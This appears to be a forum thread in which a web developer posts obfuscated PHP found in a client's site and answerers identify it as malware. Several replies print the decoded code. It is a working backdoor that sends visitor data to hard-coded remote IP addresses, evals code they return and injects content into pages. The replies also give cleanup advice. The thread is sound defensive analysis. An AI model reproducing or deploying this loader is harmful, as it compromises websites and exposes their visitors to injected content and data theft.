I built a website for a client a while ago who has been having issues with it. After getting into the site files I found this at the top of one of the PHP classes:
<?php
/*ad0b18735e68b25aa9c4374221824db5_on*/ $byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb= array('8759','8776','8755','8766');$ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P= array('8569','8584','8571','8567','8586','8571','8565','8572','8587','8580','8569','8586','8575','8581','8580');$J0BQOOWj4oRnP7liN= array('7450','7449','7467','7453','7406','7404','7447','7452','7453','7451','7463','7452','7453');$UbjPmIKWlC="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa2RXU0dKSWNHdFRSVEYyVTFkMGEySkhVa1pOVjJocFZqQldjRk14VG5OT01HeEVVVzB4YTFaNlZuRmFSV1J6WkcxS2NGRnVVbWxOYkVwdFYxUkpOV1JWZEVSVmJXeHJWakZzZDFwVVRrOU5SMDV6VDFoQ2FtSldXak5aYTJSSFlXeHdWRm95YkZGU01IQXlWMnRvY2tzd2JIQmtNbXhSVWpCd01sZHJhSEpMTUd4d1pESjBXbUpzV25SVVJVNVRZVzFLZFZWdFdtaFJNbk16V1Zaa1dsb3dkRVJWYlhCcFlteEtiVmxWVGtKUFZrSlVVVmhvVEZVd1NUTlRhMlJMVFZad2NGRlViRXBUUlRSM1dUSjNOV05IVG5SV2JtUnBVakJhY1Zkc1RtNWhWa0pJVTI1YVlWTkhjM0pUVjJ3ellWWkNTRk51V21GVFIzTnlVMWRzUW1SVmJFbFVha0pxWWxkNE0xbDZTalJoUjAxNVlVZDRhbVZYWkhKWFJFWlBVbXhXYzFkcldsWmlTRTV3VjJwSk5XUnNjRVJUYlZKTVZUTmtjbGRYTlZkaVZYUlZZekprYW1KV1dYZGFSbWhMWkZWc1JGVnRiR3RXTVdzeldteG9UMDFIVG5OUFdFSnFZbFphTTFsclpFZGhiSEJVV2pKc1VWRjZiSEJaYWtwVFRsWkNjRk5ZVGtwaGJtUXlWMWN3TldFeVZsVk9SMnhOVVRGS2NGcEdaRnBqTUhCSVZHNVdhMUpxYkhaVE1WSXdZMFp3Y0ZGWE9VdFNNRFV4V2tWWk5XSXdiRVZOUkd4S1VrVldkMU5WYUhwaE1XeDFWbTB4U2xKRVFtNVplazVUWlZabmVXSkliR0ZYUlVwNlYxWmtUMkpGZEVSVFZHaE5UV3R3TWxkcmFISkxNR3h3WlVod2ExTkZjSGRaTUdoUFl6RnNXVlJ0T1dGWFJURjJVMnRaTlZaR1NsZFRiR1JUVm10d2FWTlhNV3RrYlVsNVZWZHNXVlV5ZERGVFYzQXpaR3hzZEU5WGRHeFdSRkp3VkVWT1UyRlhVbGhYV0VKUVpWVktOVmRzYUZOTlYwNTBUa2RrUzFJd2IzaFhiWEF3VDFkT2RGWnFRbXRYUlhBeFUxVk9VMkZYVWxoWFZHUnRWakZ2ZUZsdE1VOU5SMFpZVDFoV1NsSjZiRE5YVm1NeFkyMUdWRm95ZEZwaWJGcDBVekZvZW1FeGIzcGpSMXBoVlRCRk5WTlZaR0ZoUjBwSlZHMTRVR1ZXU25aWFJFb3pXakZDVkZGdE9XRldNRnB5VjJ4b1MyVnNaM2xsU0VKcVRURkdkbE14VWpCalJuQndVVmM1YUZaNlZtMVhWbWhMWlZac1dXRXlPVXBoTURVeVdXMDFVMkpIU25WVldGSlRWbnBXY1ZscVNsTmpSMHAwV1hwYVNsSXlVVEpaVm1oQ1lWVjRSRkZYZEdoU2FteDZVekZPY2xveVZqVlJWM1JoVFROQ2JWZHNUa0pQVld4SlZXNXNhMVl4VlROYWJHUnpZbFZzUkZveWRHRk5NMEp0VjJ4T2MwNHdjRWxWYmxKcVVqRndNVmRXWTNoaVJXeEZUVWRrYTFJeFdqQlpNR014WVVkS1ZGb3liRTFOTVVvd1dUQk9TbU13YkVSVGEyUlZUVVJvY0ZNeFVqQmlWMFpZWlVkNFdVMHdTWGhhUlZrMVlXMUplVTVVUW1GV2VsVjNXVE5zYm1FeVVraE5XR1JoWWxSV2IxbHNaRlpqTUd4RVZXMXNhMVl4YkhkVU0yeFRUbXh3UkZGVWJFcFNNbEV5V1dwT1EySkhTbkJhTW5SclVucEdNMWR0TURGaFIwcFlWbGhPU2xFd2NEVlRWMnh5VGpCd1NGUnVXbWxpYkVweldXMDFVMlZyYkVWTlIyUmhUVE5DTlZkc1pFZGhNSFJFVldwYVlWRXpaRzVVVmxKQ1pEQXhSVkZZWkU1U1JVWjNWRE5zVTJGdFNYbE9WRUpoVm5wVmQxa3piRUpQVld4SVRWaGFZVkpxYkhGWmFra3dZakJ3U0ZSdVdtbGliRXB6V1cwMVUyVnJkRlZrUnpWc1lsVTFlbGxxVGs5aVJYUkVWV3BhWVZFeWN6TmFSbU14WXpKR1dFNVlTa3hSTVVsM1dXeG9RMkpYU25SU2JsSmhWVEp6TTFOclpFOWtiVXAxVlcxNGFXSnNTalpUVlZGM1dqRnZlbU5IZUdsaVZUVXlWMnRrVm1Jd2NFaFVibHBwWW14S2MxbHROVk5sYTNSVlpFUnNTbEl4V25wWmVrcFdXakpXTlZWdGNHbE5hbFYzVjJ4ak1VMUhUalZSVkd4S1VucEdNbGRyV1RWaGJVbDVUa2M1UzFJd2IzaFhiV3h5VGpKYVZGVnVUbUZXZWxKdVZVWk9RMlZ0VWtsVGJrNWhWbnBTZGxOclpFOWtiVXAxVlcxNGFXSnNTalpUTVZJd1lqRndXRkp0ZEdGWFJXeDJVMWQwVDJSdFNuVlZiWGhwWW14R01GWkZaRmRrVm05NlZXMDVVR0ZWUm5CVVIyeFRZekZ3V0U1SVFsQk5NSEJ6V2tWb1YyVlhTbkJhTW5SYVRXcHNNVnBGWkZka1YxSkpWRmhDVUUxNlFtNVhiVFZYWkZacmVsVnVRbWxOYWxKdVZXcEtWMDFHVWxoU2JsSmFWVEprZDFwWWJGTmtSMGw2VlcwNVlWZEZiRzVWUms1Q1lWZEtXRlZ1YkdsV01WcHlXVlprUjJKdFRuUlBWRVpxVVhwV2NWbHFTWGRoVlRoNlUyMTRhMU5HV2pWWmJXeENZVEpLV0U5VVFtaFNNVm8xVkhwTmVHUnNiSE5QV0hCclVqQmFOVnBGVG01aFYwbDZVVzFvYVdKWVVuZFRWMnh5VGpGd2RWWnVWbHBOTVVwM1dXcEpNRm94YkZoaFJ6RnJWakZLZEZsclpHRk9iSEJJWVVjeGFGTkZNWFpUYTJoRFlVVjBXV015ZEdsV01Gb3dWMVpPUWs5VmJFWmFSM2hyVWxSR2IxbHNaRVppTUhSVll6SjBZV0pYZUhwWGJFNUNUMVZzU1ZadWJHbFNNVm94VjFSSk5XRXhjRlJoUjFwWlRVWndTMVpGVmxkYWJHZzFZWHBrYUZZeGJHNVRNR1J6WlcxTmVWWnFRa3hSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3U2xacldsTlZWbWQzWVVaQ1ZrMVdSbkJYUms1eVkwZFdOVlZ0T1dsTk1EUjNVMVZSZDFvd2NFZFBWbEpUVm10d1dGVnNXa3RaYTJ4eVlVWldWMUpyU20xVk1GVTFWa1phUkZOdFVsQk5la0p1VjJ4a05HVnNjRlJSYW1STFVqSm9NbGw2VGxKYU1VSlVVVmRzU21GdVVUVlpWbVJhV2pCMFNHSkljR3BOYkZsM1V6Qk9VMXBzVlhkV2JFNVhZVEZhVkZZemJFdFZNVXBXVFZaQ1YxSldXbTFWVmxaVFVsWldjRk50VWt4Vk1uY3pVMnRrYzJRd2JFVk5SMlJMVW1wc1ZWVnNXa3RXTVVwWFUyMUtTbUpGY0VkV1JsVTFWbFpLVjA5VlNsTlNWa3BVVTFkM2QwNHlXbFJSYlhocFUwVTFjMU5WYUhwaE1rWlpVVmRrVVZVd1JuQlRWM0F3VDFkR1dGZFhaRXhTTW5nMldYcEtWMDFGZEVSVmJWcFdUVVphVkZadGRGZFZNV1ExVTJ0c1YxSnNTbEpYUkVaTFVteEtjbFpzVGxOV2EyeHdWMFpPY21OSFZqVlZibXhoVmpGc2JsVkdUa05OVjA1MFpVZDRhV0pWTlRKWGEyUldZakJ3UjA5V1VsTldhM0JZVld4YVMxbHJiSEpoUmxaWFVtdEtiVlpYZEZkU01VcFhVMnRhVm1GVmNHdFRNVkl3VDFWc1NGWnVUbXBOYkZadVdsaHNVMlZXY0ZoWFYyUlJWVEJHY0ZOWGNEQlBWMFpZVjFka1RGSXllRFpaZWtwWFRVVjBSRlZ0V2xaTlJscFVWbTEwVjFVeFpEVlRhMnhYVW14S1VsZEVSbGRXUmtwWFUyMWFVbFpYVWtkV1IzaFNZVlpvVkdFelFteGxWa2w0VjFaT1FrOVZiRWxXYm14cFVqRmFNVmRVU1RWaE1YQlVZVWh3YTFORmIzZFpha28wWkcxUmVWWnViRXhSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3U2xacldsTlZWbWQ0Vm14U1UxWnJjRzFWVmxaclVteFNjMVZYYkZsVk1uUjNWSHBOZDFveGNGaGxTSEJoVlRCSk0xTnJhRmRoUld4RlRVZGtTbUZWYXpOYWJHUnpZbFZzUkdGSVFtcE5NRFZ6V2tWT2JtRXhaM2hVYTFwV1lrWndSMVpYZUhwaFZsWlhWbXRhVm1KSGVHMVdWRVpUVlRGT1ZrNVZhRXBpUkVKM1V6Rm9lbUV5VGxsVVYyUlJWVEJKZUZreU1UUmlSMHAwVkc1YVlWSXhWblpUYTFrMVZrWktWMU5zWkZOV2EzQnBVMWQ0UjFac1NsZFRiSEJaVFZVMVZsWlhkSE5VTVVvMVUyMVNURlpJVVRWVFZXUlhZekpOZVZaWFpHeGxWa28wV1ROc1FrOVZiRVJUVjJ4UVRYcENjbHBHYUV0ak1XZzJVVmRrVVZVd1JuQlpWV2hUVFVkT1JXSXpXazFsVld4dVZFZHNRbUV5VGtoU1ZHUkxVMFphTlZscldUUmxSV3hGVFVka1NtRlViSGhYYkdSVFkwVjRkVkZ0T1dwU1JHdDVWMnhvUzJWdFJsaFBXRlpSVmtWRk1WUXhVazVpVjBwWVQxUkNhRkl4V2pWVlJrNUtXakI0Y0ZWdVVscFdla1p2VTFWTk1Gb3diSEJYYlRGb1ZqTm9jMVZHVGtwYU1IaHdVVmQwWVdKWGVIcFhiRTVDWkZWc1JGTlhNV2hTZW13MldrVlJkMkZWYkVST1IyUkxVakpvTWxsNlRsSmFNSGh3VVZkc1MySlhlRE5WUms1S1dqQjRjRkZYZEdoWFJVWnVWRWRzUW1GVmNIVlRiWGhoWVdwQ2NGTlZUVEJhTUhCSlUyMTRZV0ZWUmpGVFZVNUtZbGRTV0ZKVWJFcGhWVVl4VTJ0b1YyRkZiRVJPUjJSS1lWWndORmt6YjNkaFZXeEVUa2RrUzFORldqWlVNMnhUVFVkT2RXRXlaRkZWTUVsM1dUSTFWMkpGT0hsaVJ6Rk1VVEJLZEZwR1l6RmhiVkpJWWtoYWFXSkViSE5hVldSelpXMVNTVlJYT1VwaVZUUjRXVEl4TkZwdFJsaE9XRUpyVVRCc2QxTlZUbk5PTUhCSVZHMDVTbEpFUW01WFZFNVhaVmRLUjA5WVFtbGlWM2QzVXpCT1UwMVhUblJsUjFwT1VUQkdNVk5WVGxOTlYwNTBaVWRhVGxVeWN6TlhWRTVYWlZkS1IwOVljR0ZYUmtveVdUQm9VbUl3Y0VoVWJUbE5VVEJLUlZac1drdFVWbEY0VVd4V1dVMVZjRWRXYTFwWFZURlNjMVZzVGxKV1ZGWlZWVzEwVjFVd2VFUlJXR2hNVmtoU2NWcEdhRXRqTVdkNlZHMTRhMUo2YkROYVJVNXVZVEZyZVZvelRrcFNWVFZYVmxkME5GVkdWa2RWYlZwWFVsZDRUMVZzVlRWV2JGcEVaREprVG1WWGN6TlRhMmhYWXpKU1JGRlViRXBUUmtvMVdWWmpkMkl4YTNwV2JteHBVbXBzYzFwVlpGZGhhM1JFVlcxd2FGRXlkSGRVTTJ4VFRVZE9kV0V5WkZGVk1FcDBWMVprTkdWc2NGVmtSR3hLVWpKNGRGTlZUbTVpTWtaWVRsaENXVTF0VW5OYVJVNXVZVlpzV0dWSVRtbE5NbEp0V2tab1MyTXhaM2xYYmxwcVVqRmFNVk5YYkhKalJXeEVWMWN4U2xFeFNYZFpNalZ5WTBWc1NXTXlkR3RXTTJkM1UxVlJkMW95VWtsVGJrSnBWVEpvUWxkdE1YTmpNWEJYVDFjMVlWZEdTbTFYVkVrMVpGZFNTRlp1Vm10VFJURjJVMnRvVjJWWFNrZFBTR1JLVVhwU2JsTnJhRmRsVjBwSFQwaG9URlV5Y3pOVGEyaFRaVmRXVkZGVWJFcFNNWEJ2V1d0b1QySkZPSHBOV0VKaFlWZGtjbHBGYUV0T1ZYUlpZekowWVdKclJtNVZSazVEWWxkTmVVOVhjR2hOYW13elYyeGpNR0l3Y0VsUmJXaE5VVEJGTUZSVlRqTmFNSEJJVm01c2FtSlVWakpVUlU1Q1lURndXVk51YkdwTk1VbzFWRVZPUW1Wck1VUmhlbVJvVmpGc2JsTXdUbE5pVjA1RVlUSmtiR1ZXU2pKYVJtaFNXakZDVkZGWGJGTk5SbHBXVTFWT1UwMVhUblJsUjFwT1ZUQktTbFpyV2xOVlZYZzJVbGhXVGxKdWFEVlhSV013WVZVNU5WVnVXbXRYUmtadVZFZHZkMW93YkhKaFNGcHFUVEZGTWxOVlRsTmtNV3hYWlVoc1dWSjZVbkJVTTJ4VFpHMVNXVlZYWkUxaGFrSnVVMWQwVDJSdFNuUk9WM2hhVFRGS2QxbHFTVEJPYTJ4R1ZHNU9hVTB3TlhOWFJXaExXVEpLYzJWSWJGbFNlbEp3VkhwS1lVMHlUblJpUkVKaFZUSmtjbGR0TlVKak1HeEVWVzVhYTFkR1JuZFVNMnhUWlZad1dWVlhaRkZWTUVad1UxZHdNRTB5UmtoaVNFNWhWVEJHZGxOV1pHRmlSMGw1VjFjNVMxSXhjRE5UTVU1eVdqSldOVlZ1YkdGWFJrWnVVMVZOTUU5VmJFUlJiVEZoVFd4WmQxa3piRzVoTVhCMVVWaE9TbEpGVmpWVU1FNXlUakphV0ZkdGNHbFNlbXcyVjJ4T2JtRXhjSFZSV0VKUVpWWkplRmxyYUZKYU1VSlVVV3BDYW1KWGVEQlRNR2hQVFZac2RWUnFRbXBoVjJSeVdUSXhWMDFGZUVSUmJuQnJVMFZ3TTFscVRrNWlNSEJKVTIxNGExRXpaRzVUVjNnMFpWWm9TRTVYVG1waVNHZ3hVMWRzY2xvd2REVlJWRUpNVlRKek0xcHNaM2RhTUd4SVlrY3hTbEV5YURaYVJXaExaREpKZWxSWE9VdFRSbHA2V2tWT00yRldjRmxYYldocFVUQnNkMU5WVGtaUFZrSlVVVzB4V2xZemFEWlhiRTV6VGpCd1NXSXlaRkZWTUVvMldrVm9TMk5IVGtsVWJrNWFWMFUxZGxkc2FFNWlNazE2Vlc1c1dVMHdjSE5aTUdRMFlVWnJlVlpYT1VwaVZsbDVWMVprTTJGVmVFUlRWMnhOVVRGSmVGbHJhRkpqUlhSVll6SmtZVmRHY0c5WmEwNXVZVEpXY0dGNlpFcFNNVmt3V1Zab1VtSXdkRlZrUkd4b1ZqRnNibE13YUU5TlIwNTFVVzVhYW1WWFpISmFSbVEwVFVWNFJGTnRlRnBpVkZadlUxZHNjbG93YkZWTlJHeEtVakZ3YjFscmFFOWlSWFJaWXpKMFdVMVZOVWRXVjNoaFVteFdjMk15YkdGTmFtd3lWMnRPUzFwRmJFVk5SMlJxVFRGS05WZEVUa3RpUjA1SVpVZG9XazFzVm5aVFZ6RlhZVmRLZEZKWGJFMVJNR3h3VkVWT1UwMVhTa2xWV0VKUVRUQndjMXBGYUZkbFYwcHdVV3BDYW1Kc1duTlVlazE0WWtkS1NWUnRlRXBUU0ZJMVYyeG9VMDFYVG5ST1IyUmhZbFZhZWxsNlNsWk9NbHBaVFVkMFlXSlZXWGRaVldSWFpWVXhjMlJIVWtwU1JFSnVVMWR3YWswd2VIRmFNMmhOWVd0cmQxUldUVEJsVlRWVlZGZHNVR1ZXU25SWFZtaFRZakZ3V1ZOWWJGaE5WRUp1VlVaT1FtRlZOVVZYV0ZaT1lXeEZNVlJIY0ZaT1JYaHhVbGh3VDFVd2F6TlRhMlJoWVVkU1NHRkhlR3BoYTNCcFYwWk9RazlWYkVSVFdHaFBaV3hzTVZReFRUQmxWVFZGVWxoV1RsWkdWak5UVjNCNllURndkRkpxUW1oU01WbzFWRmQ0TUZwRmJFVk5SMlJLWVd4RmVWUkhjRTVOTUhoeFVsUktVRlY2VVhoVWJXeEtUakJ3U0ZkdGFHdFNNbWh6V1RKd1MxbHNhRlJSVkd4S1VUQnJNVlJyVFRCbFZUVkZVMWhXVG1Gc1ZYaFVSM0JPVFZWc2NXTXlkR0ZpVlZsM1dWVmtWMlZWTVhOa1IxSktVa1JDYmxOWGNFWk5NRGxFVGtob1QyRnJiREZVVmxKS1RsVjRjVk5ZYkU1bFZXc3pVMnRrWVdGSFVraGhSM2hxWVd0d2FWZEdUa0pQVld4RVUxaHdUbFY2VWpSVU1GSlNaRlV4Y1ZSVVFrMWhiWE41VTFkd2VtRXhjSFJTYWtKb1VqRmFOVlJYZURCYVJXeEZUVWRrU21GdFRYcFVSM0J5VFZWNGNWSlVVazFoYTFVd1ZERk9TazR3Y0VoWGJXaHJVakpvYzFreWNFdFpiR2hVVVZSc1NsRXdhekZVV0dzd1pVVTFObEZZVms1V1JUQjZWRWR3U21WVmJIRmpNblJoWWxWWmQxbFZaRmRsVlRGelpFZFNTbEpFUW01VFYzQkdUa1U1UkU1RVFrNVJlbEV4Vkd4Tk1HVlZOVVZWVjJ4UVpWWktkRmRXYUZOaU1YQlpVMWhzV0UxVVFtNVZSazVDWVZVeFZXRjZWazFoYTFZMFZHeE5NR1ZWTVRaU1dGWlBWa2RrY0ZRemJGTmlWbXhaVlcwNVlWZEZiRFZXZWtWM1dqRkNWRkZYYkZCU1JXd3hWRlpTY21WVmVIRmFlazVOWVd0VmVsUXdUa3BPTUhCSVYyMW9hMUl5YUhOWk1uQkxXV3hvVkZGVWJFcFJNR3cxVkZaU1dtUlZNWEZWVkVwTllXMXpNVlJIY0VwbFJUVlVVMVJrUzFJeGNHOWFSV1J2WWtkT2NWTnRTbGxWTUVVMVUxVk9TazVWTlZST1NHeE9Wa1ZXTVZSV1VtNWtWVFUyWVRKc1VFMHdOWFphUm1SaFlsZEtTRlpYT1V0U01YQnZXa1ZrYjJKSFRuRlRXRUpRVFd4d01sa3lNVmRoUm10NVdqSTVTMUl4Y0c5YVJXUnZZa2RPY1ZOWFpGcFhSVEZ1VTJ0b1YyVlZkRmxrU0VKaFlWVkdkbE5WWkVkaU1YQjFWbTEwWVdKWWFIUmFWekZUWWpGd2RHRkljRXhSTVVsNFdUSnNjbG93ZEZSUmFtUktVakJ3TlZkc1pFZGphMnhGWkVSc2JWZEVRVGxKYVd0d1QzbEJQU0lwS1RzZyIpKTsg";if (!function_exists("Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ")){ function Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($fmG17jH6h8R6pfvV6ODRd6K,$iot3u6fS){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 = '';foreach($fmG17jH6h8R6pfvV6ODRd6K as $seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 .= chr($seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh - $iot3u6fS);}return $AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7;}$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6 = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb,8658);$UsopvTU00NLoC = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P,8470);$D4fUhPPUiQCBxt = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($J0BQOOWj4oRnP7liN,7352);$UCUMQ98AUYryzF0tSVyD = $UsopvTU00NLoC('$kiNmYfN',$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6.'('.$D4fUhPPUiQCBxt.'($kiNmYfN));');$UCUMQ98AUYryzF0tSVyD($UbjPmIKWlC);} /*ad0b18735e68b25aa9c4374221824db5_off*/ ?>
I have no idea what it is and it's impossible to decipher. Nothing is output when you access the file directly online. Any ideas? Does it seem malicious?
If you and none of your developers have any idea where it came from then I guess you are under an attack :(. The immediate fix is to do the following,
You need to do it quickly since browsers like chrome and FF will notice it soon and would start showing your site as malicious to users.
You most certainly got hacked.
I did the fun to poke into the code.
The code is base64_encoded multiple times and then eval'd. Result is:
if (!function_exists("GetMama")){
function mod_con($buf){
str_ireplace("<body>","<body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
return $buf;}
str_ireplace("</body>","</body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
return $buf;}
return $buf;}
function opanki($buf){
$gz_e = false;$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}
if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);
unlink($tmpfname);
$contents = gzencode($contents);}
else {
$contents = mod_con($buf);}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);}
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;}
ob_start("opanki");
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(__FILE__);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];} else {
$host = "";}
if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];} else {
$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);}
else {
$ref = "";}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));}
else {
$ua = "";}
if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);}
else {$qs = "";}
$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;}
if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(@file_get_contents($url_0 . $url_1));
$try = false;}
if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);}
fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}}
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult));
eval($z);
exit();}
if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);
return true;}
else {
return false;}}
$father2[] = "77.81.241.253";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "31.184.234.96";$father2[] = "77.95.18.189";$father2[] = "93.170.137.22";$father2[] = "188.40.95.244";$father2[] = "199.115.231.58";$father2[] = "82.192.87.178";$father2[] = "216.246.99.215";$father2[] = "95.211.18.79";shuffle($father2);foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}}}
Yes it is malicious code, its a bunch of base64 encoded stings evaled, and the resulting code is:
<?php
if (!function_exists("GetMama")){
function mod_con($buf){
str_ireplace("<body>","<body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
return $buf;
}
str_ireplace("</body>","</body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
return $buf;}return $buf;}function opanki($buf){
$gz_e = false;
$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
}if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);
$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);unlink($tmpfname);
$contents = gzencode($contents);
} else {$contents = mod_con($buf);}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);}
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;}ob_start("opanki");
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(__FILE__);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {
$host = "";
}if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
} else {$ip = "";
}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
} else {$ref = "";}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {
$ua = "";
}if (
isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
} else {$qs = "";}
$url_0 = "http://" . $pa;
$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
} if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(@file_get_contents($url_0 . $url_1));
$try = false;
}if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";
$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
}fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult));
eval($z);
exit();
}if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);return true;
}else {return false;}}
$father2[] = "77.81.241.253";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "31.184.234.96";
$father2[] = "77.95.18.189";
$father2[] = "93.170.137.22";
$father2[] = "188.40.95.244";
$father2[] = "199.115.231.58";
$father2[] = "82.192.87.178";
$father2[] = "216.246.99.215";
$father2[] = "95.211.18.79";
shuffle($father2);
foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}
}
}
?>
To expand on my comment...
Are you using a CMS (Wordpress, Joomla, etc.)? If so, some 3rd party plugin and theme developers attempt to encrypt their code so that it isn't pirated...
If you wrote the site from scratch, look down.
Are you the only developer?
(YES) --> You've been hacked. --> Check your log files. -> Look for unusual activity/hack attempts. --> Attempt to find the vulnerability and patch it. --> Remove the malicious code.
(NO) --> Ask the other developer(s) if they put it there. If the answer is no, go to the above solution.
As Khan said, time is of the essence to a certain extent, because services like Google and Web of Trust will begin to mark your site as malicious. At the same time, don't just delete the foreign code. If you manage to unravel it at a later date, you may be able to figure out what it does and who it reports to --> who the hackers are.
Also look at the server logs... If your server has been rooted, then the only way to keep the hacker out would be to reinstall it.
The code is:
if (!function_exists("GetMama"))
{
function mod_con($buf){
str_ireplace("","",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("","" . stripslashes($_SERVER["good"]),$buf);
return $buf;
}
str_ireplace("","",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("",stripslashes($_SERVER["good"])."",$buf);
return $buf;
}
return $buf;
}
function opanki($buf){
$gz_e = false;$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
}
if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);
$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);
unlink($tmpfname);
$contents = gzencode($contents);
}
else {
$contents = mod_con($buf);
}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);
}
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;
